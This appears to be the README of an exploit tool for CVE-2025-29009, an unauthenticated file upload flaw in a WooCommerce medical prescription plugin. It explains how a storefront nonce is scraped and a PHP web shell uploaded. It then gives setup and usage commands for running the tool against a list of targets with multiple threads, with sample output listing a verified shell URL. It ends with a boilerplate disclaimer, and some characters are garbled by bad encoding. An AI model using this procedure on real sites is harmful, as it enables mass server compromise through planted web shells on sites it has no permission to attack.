Share
## https://sploitus.com/exploit?id=41CB74C2-4D60-5583-89E2-025186400627
# CVE-2025-29009
WordPress Medical Prescription Attachment Plugin for WooCommerce Plugin <= 1.2.3 is vulnerable to a high priority Arbitrary File Upload
# CVE-2025-29009
### Webkul Medical Prescription Attachment โ€” Unrestricted File Upload โ†’ Web Shell

```
,-. .   , ,--.     ,-.   ,-.  ,-.  ;--'     ,-.   ,-.   ,-.   ,-.   ,-.
/    |  /  |           ) /  /\    ) |           ) (   ) /  /\ /  /\ (   )
|    | /   |-   ---   /  | / |   /  `-.  ---   /   `-'| | / | | / |  `-'|
\    |/    |         /   \/  /  /      )      /       / \/  / \/  /     /
 `-' '     `--'     '--'  `-'  '--' `-'      '--'  `-'   `-'   `-'   `-'
```

![CVE](https://img.shields.io/badge/CVE-2025--29009-critical?style=flat-square&color=8B0000)
![Plugin](https://img.shields.io/badge/Medical%20Prescription%20Attachment%20%E2%89%A4%201.2.3-555?style=flat-square)
![Auth](https://img.shields.io/badge/Auth-None-brightgreen?style=flat-square)
![Python](https://img.shields.io/badge/Python-3.8%2B-3776AB?style=flat-square&logo=python)
![Author](https://img.shields.io/badge/By-Nxploited-00aa55?style=flat-square)

---

## โถ Vulnerability

| Field | Detail |
|---|---|
| **CVE** | CVE-2025-29009 |
| **Plugin** | Webkul Medical Prescription Attachment Plugin for WooCommerce |
| **Affected** | All versions **โ‰ค 1.2.3** |
| **Auth** | **None required** |
| **Type** | Unrestricted Upload of File with Dangerous Type โ†’ Web Shell Upload |
| **CWE** | CWE-434 ยท Unrestricted Upload of File with Dangerous Type |

**Root Cause:**  
The `wkwcpa_handle_prescription_session` AJAX handler (`action=wkwcpa_handle_prescription_session`) accepts file uploads via `wkwc_pa_prescription_attachment[]` without validating file extension or MIME type server-side. An unauthenticated attacker can extract the `ajaxNonce` from the public WooCommerce storefront (embedded in `wkwcpaFrontObj` JavaScript object), then upload a PHP web shell directly to the server's uploads directory. The response returns the full accessible URL of the uploaded file.

---

## โท Attack Flow

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  1. Resolve front page                                       โ”‚
โ”‚     GET /  โ†’  GET /shop/  โ†’  GET /product/  โ†’  GET /?wkwcpa=1โ”‚
โ”‚                                                              โ”‚
โ”‚  2. Extract nonce                                            โ”‚
โ”‚     Parse wkwcpaFrontObj.ajax.ajaxUrl                        โ”‚
โ”‚     Parse wkwcpaFrontObj.ajax.ajaxNonce                      โ”‚
โ”‚                                                              โ”‚
โ”‚  3. Upload shell                                             โ”‚
โ”‚     POST                                            โ”‚
โ”‚       action = wkwcpa_handle_prescription_session            โ”‚
โ”‚       nonce  =                                    โ”‚
โ”‚       type   = upload                                        โ”‚
โ”‚       wkwc_pa_prescription_attachment[] = shell.php          โ”‚
โ”‚                                                              โ”‚
โ”‚  4. Parse response                                           โ”‚
โ”‚     JSON โ†’ data.attachments_img_html[].src  โ†’  shell URL    โ”‚
โ”‚                                                              โ”‚
โ”‚  5. Verify shell                                             โ”‚
โ”‚     GET   โ†’  check for unique signature           โ”‚
โ”‚                                                              โ”‚
โ”‚  6. Save to shells.txt                                       โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

---

## โธ Setup

```bash
git clone https://github.com/Nxploited/CVE-2025-29009.git
cd CVE-2025-29009
pip install -r requirements.txt
```

**`requirements.txt`**
```
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0
```

---

## โน Shell Preparation

Create your PHP shell and embed a unique signature string so the tool can verify successful execution:

```php

```

Save as `shell.php` in the same directory as the script.  
The string `NxploitedShellOK` is the **signature** โ€” it must appear in the shell's response for verification to pass.

---

## โบ Usage

```bash
python3 CVE-2025-29009.py
```

### Prompts

```
Targets file (default list.txt):              list.txt
Threads (default 10):                         10
Local shell filename (e.g. shell.php):        shell.php
Unique shell signature (e.g. NxploitedShellOK): NxploitedShellOK
```

### Targets Format โ€” `list.txt`

```
https://target1.com
target2.com
http://target3.com
```

> Targets without `http://` or `https://` are automatically prefixed with `http://`.

---

## โป Output

| File | Contents |
|---|---|
| `shells.txt` | One verified shell URL per line |

**Terminal:**
```
[SHELL]  https://target.com/wp-content/uploads/2025/06/shell.php
[FAIL]   https://target2.com  (nonce_not_found)
[FAIL]   https://target3.com  (success_false)
[Status] 3/3  OK:1  FAIL:2
```

---

## โผ Failure Codes

| Code | Meaning |
|---|---|
| `shell_file_missing` | `shell.php` not found in working directory |
| `no_front_page` | No candidate page returned HTTP 200 |
| `nonce_not_found` | `wkwcpaFrontObj` not present on any page |
| `upload_error` | Network error during POST |
| `json_parse_error` | Response is not valid JSON |
| `success_false` | Server returned `data.success = false` |
| `no_attachments` | Upload succeeded but no URL in response |
| `shell_url_not_found` | Could not parse file URL from response HTML |

---

## โฝ Author

```
Nxploited
GitHub   โ†’  https://github.com/Nxploited
Telegram โ†’  @KNxploited
```

[![GitHub](https://img.shields.io/badge/GitHub-Nxploited-181717?style=for-the-badge&logo=github)](https://github.com/Nxploited)
[![Telegram](https://img.shields.io/badge/Telegram-@KNxploited-2CA5E0?style=for-the-badge&logo=telegram)](https://t.me/KNxploited)

---

## โพ Disclaimer

```
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.
```

---

ยฉ 2025 Nxploited ยท Medical Prescription Attachment โ‰ค 1.2.3 ยท Fixed in 1.2.4